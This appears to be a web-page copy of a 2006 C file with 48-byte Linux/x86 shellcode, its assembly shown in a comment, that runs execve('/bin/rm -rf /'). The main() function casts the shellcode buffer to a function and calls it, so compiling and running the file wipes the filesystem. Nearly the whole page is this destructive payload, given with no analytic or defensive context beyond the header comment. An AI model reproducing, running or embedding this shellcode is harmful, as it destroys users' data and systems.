|
/* By Kris Katterjohn 8/31/2006
*
* 48 byte shellcode to execve("rm -rf /") for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
*
* push byte 11
* pop eax
* xor esi, esi
* push esi
* push byte 0x2f
* mov edi, esp
* push esi
* push word 0x662d
* mov edx, esp
* push esi
* push word 0x722d
* mov ecx, esp
* push esi
* push 0x6d722f2f
* push 0x6e69622f
* mov ebx, esp
* push esi
* push edi
* push edx
* push ecx
* push ebx
* mov ecx, esp
* xor edx, edx
* int 0x80
*/main()
{
char shellcode[] =
"\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
"\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
"\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
"\xd2\xcd\x80"; (*(void (*)()) shellcode)();
}
|
| |
|
推荐
评论(0条)
